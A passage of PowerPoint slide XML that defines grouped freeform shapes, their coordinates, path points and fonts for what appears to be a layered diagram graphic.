                <a:off x="6706552" y="2829923"/>
                <a:ext cx="890645" cy="523747"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 636"/>
                  <a:gd name="T1" fmla="*/ 0 h 374"/>
                  <a:gd name="T2" fmla="*/ 407 w 636"/>
                  <a:gd name="T3" fmla="*/ 0 h 374"/>
                  <a:gd name="T4" fmla="*/ 636 w 636"/>
                  <a:gd name="T5" fmla="*/ 186 h 374"/>
                  <a:gd name="T6" fmla="*/ 407 w 636"/>
                  <a:gd name="T7" fmla="*/ 374 h 374"/>
                  <a:gd name="T8" fmla="*/ 192 w 636"/>
                  <a:gd name="T9" fmla="*/ 374 h 374"/>
                  <a:gd name="T10" fmla="*/ 0 w 636"/>
                  <a:gd name="T11" fmla="*/ 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36" h="374">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="407" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="116" name="Group 115"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5149324" y="2014895"/>
              <a:ext cx="1054490" cy="642780"/>
              <a:chOff x="5149324" y="2014895"/>
              <a:chExt cx="1054490" cy="642780"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5149324" y="2014895"/>
                <a:ext cx="1054490" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 278 w 753"/>
                  <a:gd name="T1" fmla="*/ 459 h 459"/>
                  <a:gd name="T2" fmla="*/ 475 w 753"/>
                  <a:gd name="T3" fmla="*/ 459 h 459"/>
                  <a:gd name="T4" fmla="*/ 753 w 753"/>
                  <a:gd name="T5" fmla="*/ 0 h 459"/>
                  <a:gd name="T6" fmla="*/ 278 w 753"/>
                  <a:gd name="T7" fmla="*/ 0 h 459"/>
                  <a:gd name="T8" fmla="*/ 0 w 753"/>
                  <a:gd name="T9" fmla="*/ 214 h 459"/>
                  <a:gd name="T10" fmla="*/ 278 w 753"/>
                  <a:gd name="T11" fmla="*/ 459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3" h="459">
                    <a:moveTo>
                      <a:pt x="278" y="459"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="475" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="459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" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5199738" y="2044303"/>
                <a:ext cx="985871" cy="585364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 252 w 704"/>
                  <a:gd name="T1" fmla="*/ 418 h 418"/>
                  <a:gd name="T2" fmla="*/ 0 w 704"/>
                  <a:gd name="T3" fmla="*/ 194 h 418"/>
                  <a:gd name="T4" fmla="*/ 251 w 704"/>
                  <a:gd name="T5" fmla="*/ 0 h 418"/>
                  <a:gd name="T6" fmla="*/ 704 w 704"/>
                  <a:gd name="T7" fmla="*/ 0 h 418"/>
                  <a:gd name="T8" fmla="*/ 452 w 704"/>
                  <a:gd name="T9" fmla="*/ 418 h 418"/>
                  <a:gd name="T10" fmla="*/ 252 w 704"/>
                  <a:gd name="T11" fmla="*/ 418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4" h="418">
                    <a:moveTo>
                      <a:pt x="252" y="418"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="418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17" name="Group 116"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7441754" y="4331144"/>
              <a:ext cx="1013878" cy="614772"/>
              <a:chOff x="7441754" y="4331144"/>
              <a:chExt cx="1013878" cy="614772"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="151" name="Freeform 9"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7441754" y="4331144"/>
                <a:ext cx="1013878" cy="614772"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 465 w 724"/>
                  <a:gd name="T1" fmla="*/ 438 h 439"/>
                  <a:gd name="T2" fmla="*/ 218 w 724"/>
                  <a:gd name="T3" fmla="*/ 439 h 439"/>
                  <a:gd name="T4" fmla="*/ 0 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 439"/>
                  <a:gd name="T6" fmla="*/ 465 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 439"/>
                  <a:gd name="T8" fmla="*/ 724 w 724"/>
                  <a:gd name="T9" fmla="*/ 217 h 439"/>
                  <a:gd name="T10" fmla="*/ 465 w 724"/>
                  <a:gd name="T11" fmla="*/ 438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4" h="439">
                    <a:moveTo>
                      <a:pt x="465" y="438"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="218" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="438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" name="Freeform 10"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7459959" y="4366153"/>
                <a:ext cx="942459" cy="543352"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 673"/>
                  <a:gd name="T1" fmla="*/ 0 h 388"/>
                  <a:gd name="T2" fmla="*/ 444 w 673"/>
                  <a:gd name="T3" fmla="*/ 0 h 388"/>
                  <a:gd name="T4" fmla="*/ 673 w 673"/>
                  <a:gd name="T5" fmla="*/ 193 h 388"/>
                  <a:gd name="T6" fmla="*/ 444 w 673"/>
                  <a:gd name="T7" fmla="*/ 388 h 388"/>
                  <a:gd name="T8" fmla="*/ 192 w 673"/>
                  <a:gd name="T9" fmla="*/ 388 h 388"/>
                  <a:gd name="T10" fmla="*/ 0 w 673"/>
                  <a:gd name="T11" fmla="*/ 0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3" h="388">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="3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ckwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="118" name="Group 117"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4429526" y="2014895"/>
              <a:ext cx="3753031" cy="4082143"/>
              <a:chOff x="4429526" y="2014895"/>
              <a:chExt cx="3753031" cy="4082143"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="127" name="Freeform 15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2014895"/>
                <a:ext cx="389307" cy="642780"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 278"/>
                  <a:gd name="T1" fmla="*/ 420 h 459"/>
                  <a:gd name="T2" fmla="*/ 278 w 278"/>
                  <a:gd name="T3" fmla="*/ 0 h 459"/>
                  <a:gd name="T4" fmla="*/ 0 w 278"/>
                  <a:gd name="T5" fmla="*/ 459 h 459"/>
                  <a:gd name="T6" fmla="*/ 201 w 278"/>
                  <a:gd name="T7" fmla="*/ 420 h 459"/>
                  <a:gd name="T8" fmla="*/ 201 w 278"/>
                  <a:gd name="T9" fmla="*/ 420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8" h="459">
                    <a:moveTo>
                      <a:pt x="201" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="278" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="420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" name="Freeform 16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877524" y="2196946"/>
                <a:ext cx="260472" cy="420118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 186 w 186"/>
                  <a:gd name="T1" fmla="*/ 0 h 300"/>
                  <a:gd name="T2" fmla="*/ 134 w 186"/>
                  <a:gd name="T3" fmla="*/ 273 h 300"/>
                  <a:gd name="T4" fmla="*/ 0 w 186"/>
                  <a:gd name="T5" fmla="*/ 300 h 300"/>
                  <a:gd name="T6" fmla="*/ 186 w 186"/>
                  <a:gd name="T7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6" h="300">
                    <a:moveTo>
                      <a:pt x="186" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="134" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186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" name="Freeform 17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6095984" y="2014895"/>
                <a:ext cx="481732" cy="623174"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 344"/>
                  <a:gd name="T1" fmla="*/ 420 h 445"/>
                  <a:gd name="T2" fmla="*/ 77 w 344"/>
                  <a:gd name="T3" fmla="*/ 0 h 445"/>
                  <a:gd name="T4" fmla="*/ 344 w 344"/>
                  <a:gd name="T5" fmla="*/ 445 h 445"/>
                  <a:gd name="T6" fmla="*/ 0 w 344"/>
                  <a:gd name="T7" fmla="*/ 420 h 445"/>
                  <a:gd name="T8" fmla="*/ 0 w 344"/>
                  <a:gd name="T9" fmla="*/ 420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4" h="445">
                    <a:moveTo>
                      <a:pt x="0" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420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" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6133794" y="2108721"/>
                <a:ext cx="385106" cy="495739"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 275"/>
                  <a:gd name="T1" fmla="*/ 334 h 354"/>
                  <a:gd name="T2" fmla="*/ 62 w 275"/>
                  <a:gd name="T3" fmla="*/ 0 h 354"/>
                  <a:gd name="T4" fmla="*/ 275 w 275"/>
                  <a:gd name="T5" fmla="*/ 354 h 354"/>
                  <a:gd name="T6" fmla="*/ 0 w 275"/>
                  <a:gd name="T7" fmla="*/ 334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354">
                    <a:moveTo>
                      <a:pt x="0" y="334"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="334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" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2603060"/>
                <a:ext cx="763210" cy="85424"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 545"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 545 w 545"/>
                  <a:gd name="T3" fmla="*/ 25 h 61"/>
                  <a:gd name="T4" fmla="*/ 351 w 545"/>
                  <a:gd name="T5" fmla="*/ 61 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 545"/>
                  <a:gd name="T7" fmla="*/ 39 h 61"/>
                  <a:gd name="T8" fmla="*/ 201 w 545"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 201 w 545"/>
                  <a:gd name="T1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5" h="61">
                    <a:moveTo>
                      <a:pt x="201" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="545" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0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" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="3363473"/>
                <a:ext cx="1541823" cy="61617"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 1101 w 1101"/>
                  <a:gd name="T3" fmla="*/ 18 h 44"/>
                  <a:gd name="T4" fmla="*/ 674 w 1101"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 1101"/>
                  <a:gd name="T7" fmla="*/ 29 h 44"/>
                  <a:gd name="T8" fmla="*/ 376 w 1101"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1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01" h="44">
                    <a:moveTo>
                      <a:pt x="376" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="674" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="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" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="2754302"/>
                <a:ext cx="616169" cy="649782"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 440"/>
                  <a:gd name="T1" fmla="*/ 435 h 464"/>
                  <a:gd name="T2" fmla="*/ 440 w 440"/>
                  <a:gd name="T3" fmla="*/ 0 h 464"/>
                  <a:gd name="T4" fmla="*/ 199 w 440"/>
                  <a:gd name="T5" fmla="*/ 48 h 464"/>
                  <a:gd name="T6" fmla="*/ 0 w 440"/>
                  <a:gd name="T7" fmla="*/ 464 h 464"/>
                  <a:gd name="T8" fmla="*/ 376 w 440"/>
                  <a:gd name="T9" fmla="*/ 435 h 464"/>
                  <a:gd name="T10" fmla="*/ 376 w 440"/>
                  <a:gd name="T11" fmla="*/ 435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0" h="464">
                    <a:moveTo>
                      <a:pt x="376" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="440" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5509223" y="2797714"/>
                <a:ext cx="519543" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 177 w 371"/>
                  <a:gd name="T1" fmla="*/ 38 h 406"/>
                  <a:gd name="T2" fmla="*/ 371 w 371"/>
                  <a:gd name="T3" fmla="*/ 0 h 406"/>
                  <a:gd name="T4" fmla="*/ 315 w 371"/>
                  <a:gd name="T5" fmla="*/ 381 h 406"/>
                  <a:gd name="T6" fmla="*/ 0 w 371"/>
                  <a:gd name="T7" fmla="*/ 406 h 406"/>
                  <a:gd name="T8" fmla="*/ 177 w 371"/>
                  <a:gd name="T9" fmla="*/ 38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1" h="406">
                    <a:moveTo>
                      <a:pt x="177" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="371" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="38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" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5979752" y="2754302"/>
                <a:ext cx="1015279" cy="634378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 725"/>
                  <a:gd name="T1" fmla="*/ 435 h 453"/>
                  <a:gd name="T2" fmla="*/ 64 w 725"/>
                  <a:gd name="T3" fmla="*/ 0 h 453"/>
                  <a:gd name="T4" fmla="*/ 507 w 725"/>
                  <a:gd name="T5" fmla="*/ 30 h 453"/>
                  <a:gd name="T6" fmla="*/ 725 w 725"/>
                  <a:gd name="T7" fmla="*/ 453 h 453"/>
                  <a:gd name="T8" fmla="*/ 0 w 725"/>
                  <a:gd name="T9" fmla="*/ 435 h 453"/>
                  <a:gd name="T10" fmla="*/ 0 w 725"/>
                  <a:gd name="T11" fmla="*/ 435 h 4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5" h="453">
                    <a:moveTo>
                      <a:pt x="0" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:ln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" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6017562" y="2792113"/>
                <a:ext cx="920053" cy="561557"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 657"/>
                  <a:gd name="T1" fmla="*/ 384 h 401"/>
                  <a:gd name="T2" fmla="*/ 57 w 657"/>
                  <a:gd name="T3" fmla="*/ 0 h 401"/>
                  <a:gd name="T4" fmla="*/ 465 w 657"/>
                  <a:gd name="T5" fmla="*/ 26 h 401"/>
                  <a:gd name="T6" fmla="*/ 657 w 657"/>
                  <a:gd name="T7" fmla="*/ 401 h 401"/>
                  <a:gd name="T8" fmla="*/ 0 w 657"/>
                  <a:gd name="T9" fmla="*/ 384 h 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7" h="401">
                    <a:moveTo>
                      <a:pt x="0" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="384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" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5096109" y="3544123"/>
                <a:ext cx="857035" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 541 w 612"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 612 w 612"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 195 w 612"/>
                  <a:gd name="T5" fmla="*/ 17 h 473"/>
                  <a:gd name="T6" fmla="*/ 0 w 612"/>
                  <a:gd name="T7" fmla="*/ 422 h 473"/>
                  <a:gd name="T8" fmla="*/ 541 w 612"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 541 w 612"/>
                  <a:gd name="T11" fmla="*/ 473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2" h="473">
                    <a:moveTo>
                      <a:pt x="541" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="612" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3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" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5146523" y="3579133"/>
                <a:ext cx="767411" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 548"/>
                  <a:gd name="T1" fmla="*/ 376 h 423"/>
                  <a:gd name="T2" fmla="*/ 175 w 548"/>
                  <a:gd name="T3" fmla="*/ 16 h 423"/>
                  <a:gd name="T4" fmla="*/ 548 w 548"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 485 w 548"/>
                  <a:gd name="T7" fmla="*/ 423 h 423"/>
                  <a:gd name="T8" fmla="*/ 0 w 548"/>
                  <a:gd name="T9" fmla="*/ 376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8" h="423">
                    <a:moveTo>
                      <a:pt x="0" y="376"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="376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" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5853717" y="3544123"/>
                <a:ext cx="1539023" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1099"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 71 w 1099"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 878 w 1099"/>
                  <a:gd name="T5" fmla="*/ 11 h 473"/>
                  <a:gd name="T6" fmla="*/ 1099 w 1099"/>
                  <a:gd name="T7" fmla="*/ 440 h 473"/>
                  <a:gd name="T8" fmla="*/ 0 w 1099"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 0 w 1099"/>
                  <a:gd name="T11" fmla="*/ 473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99" h="473">
                    <a:moveTo>
                      <a:pt x="0" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473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" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5892928" y="3577733"/>
                <a:ext cx="1445197" cy="595167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 1032"/>
                  <a:gd name="T1" fmla="*/ 0 h 425"/>
                  <a:gd name="T2" fmla="*/ 835 w 1032"/>
                  <a:gd name="T3" fmla="*/ 11 h 425"/>
                  <a:gd name="T4" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T5" fmla="*/ 393 h 425"/>
                  <a:gd name="T6" fmla="*/ 0 w 1032"/>
                  <a:gd name="T7" fmla="*/ 425 h 425"/>
                  <a:gd name="T8" fmla="*/ 64 w 1032"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="425">
                    <a:moveTo>
                      <a:pt x="64" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="835" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="425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" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5019088" y="4244319"/>
                <a:ext cx="2457675" cy="161045"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1755"/>
                  <a:gd name="T1" fmla="*/ 36 h 115"/>
                  <a:gd name="T2" fmla="*/ 1052 w 1755"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 1755 w 1755"/>
                  <a:gd name="T5" fmla="*/ 64 h 115"/>
                  <a:gd name="T6" fmla="*/ 576 w 1755"/>
                  <a:gd name="T7" fmla="*/ 115 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 1755"/>
                  <a:gd name="T9" fmla="*/ 36 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 1755"/>
                  <a:gd name="T11" fmla="*/ 36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55" h="115">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1052" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1755" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4747414" y="4294733"/>
                <a:ext cx="1078296" cy="838835"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
